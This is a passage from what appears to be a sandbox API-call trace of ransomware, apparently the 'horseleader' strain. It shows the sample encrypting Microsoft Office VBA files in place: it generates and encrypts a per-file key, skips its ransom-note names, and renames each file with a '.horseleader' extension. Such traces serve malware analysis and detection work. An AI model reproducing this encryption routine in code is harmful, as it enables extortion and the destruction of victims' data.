Flags=0x8, Size=0x840) returned 0x7e4970 [0250.057] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.horseleader") returned 86 [0250.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.horseleader")) returned 1 [0250.058] GetProcessHeap () returned 0x780000 [0250.058] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.058] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2be900, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5f2be900, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x25d50, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBE7INTL.DLL", cAlternateFileName="")) returned 1 [0250.058] lstrcmpiW (lpString1="VBE7INTL.DLL", lpString2="Windows") returned -1 [0250.058] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL") returned 77 [0250.058] StrStrIW (lpFirst="VBE7INTL.DLL", lpSrch=".horseleader") returned 0x0 [0250.058] lstrcmpW (lpString1="VBE7INTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.058] lstrcmpW (lpString1="VBE7INTL.DLL", lpString2="_uninstalling_.png") returned 1 [0250.058] lstrlenW (lpString=".testttjffg") returned 11 [0250.058] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL", lpSrch=".testttjffg") returned 0x0 [0250.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.340] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL") returned 77 [0250.340] StrStrW (lpFirst="VBE7INTL.DLL", lpSrch=".txt") returned 0x0 [0250.340] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=154960) returned 1 [0250.340] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.340] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.350] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.350] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.352] SetFilePointerEx (in: hFile=0x15c, 
liDistanceToMove=0x106a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.352] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.352] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.353] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x20d50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.353] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.358] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.359] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.359] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.359] CloseHandle (hObject=0x15c) returned 1 [0250.359] GetProcessHeap () returned 0x780000 [0250.359] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.359] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL.horseleader") returned 89 [0250.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll.horseleader")) returned 1 [0250.361] GetProcessHeap () returned 0x780000 [0250.361] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.361] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2ba100, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7d2ba100, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x1195f, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBENDF98.CHM", cAlternateFileName="")) returned 1 [0250.361] lstrcmpiW (lpString1="VBENDF98.CHM", lpString2="Windows") returned -1 [0250.361] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 77 [0250.361] 
StrStrIW (lpFirst="VBENDF98.CHM", lpSrch=".horseleader") returned 0x0 [0250.361] lstrcmpW (lpString1="VBENDF98.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.361] lstrcmpW (lpString1="VBENDF98.CHM", lpString2="_uninstalling_.png") returned 1 [0250.361] lstrlenW (lpString=".testttjffg") returned 11 [0250.361] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM", lpSrch=".testttjffg") returned 0x0 [0250.361] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.361] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.363] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 77 [0250.363] StrStrW (lpFirst="VBENDF98.CHM", lpSrch=".txt") returned 0x0 [0250.363] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=72031) returned 1 [0250.363] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.363] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.366] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0250.366] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x64af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.367] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.368] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.368] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xc95f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.368] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.368] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.368] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.369] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0250.369] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.369] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.369] CloseHandle (hObject=0x15c) returned 1 [0250.369] GetProcessHeap () returned 0x780000 [0250.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.369] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.horseleader") returned 89 [0250.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.horseleader")) returned 1 [0250.370] GetProcessHeap () returned 0x780000 [0250.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.371] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8583dc00, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x8583dc00, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0xe2aa, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBHW6.CHM", 
cAlternateFileName="")) returned 1 [0250.371] lstrcmpiW (lpString1="VBHW6.CHM", lpString2="Windows") returned -1 [0250.371] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 74 [0250.371] StrStrIW (lpFirst="VBHW6.CHM", lpSrch=".horseleader") returned 0x0 [0250.371] lstrcmpW (lpString1="VBHW6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.371] lstrcmpW (lpString1="VBHW6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.371] lstrlenW (lpString=".testttjffg") returned 11 [0250.371] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 74 [0250.372] StrStrW (lpFirst="VBHW6.CHM", lpSrch=".txt") returned 0x0 [0250.372] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=58026) returned 1 [0250.372] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 
[0250.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.375] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.376] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.376] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.376] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.377] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x42aa, lpOverlapped=0x0) returned 1 [0250.377] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbd56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.377] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x42aa, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x42aa, lpOverlapped=0x0) returned 1 [0250.377] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.377] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, 
lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.378] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.378] CloseHandle (hObject=0x15c) returned 1 [0250.378] GetProcessHeap () returned 0x780000 [0250.378] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.378] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.horseleader") returned 86 [0250.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.horseleader")) returned 1 [0250.379] GetProcessHeap () returned 0x780000 [0250.379] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.379] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x903e7100, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x903e7100, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0xe6b62, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBLR6.CHM", cAlternateFileName="")) returned 1 [0250.379] lstrcmpiW (lpString1="VBLR6.CHM", lpString2="Windows") returned -1 [0250.379] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 74 [0250.379] StrStrIW (lpFirst="VBLR6.CHM", lpSrch=".horseleader") returned 0x0 [0250.380] lstrcmpW (lpString1="VBLR6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.380] lstrcmpW (lpString1="VBLR6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.380] lstrlenW (lpString=".testttjffg") returned 11 [0250.380] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.380] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.380] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.380] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vblr6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.381] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 74 [0250.381] StrStrW (lpFirst="VBLR6.CHM", lpSrch=".txt") returned 0x0 [0250.381] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=944994) returned 1 [0250.381] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.381] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.383] SetFilePointerEx (in: hFile=0x15c, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.383] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.384] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x70db1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.384] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.387] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.387] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.387] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xe1b62, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.387] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.389] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.389] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.390] SetFilePointerEx (in: hFile=0x15c, 
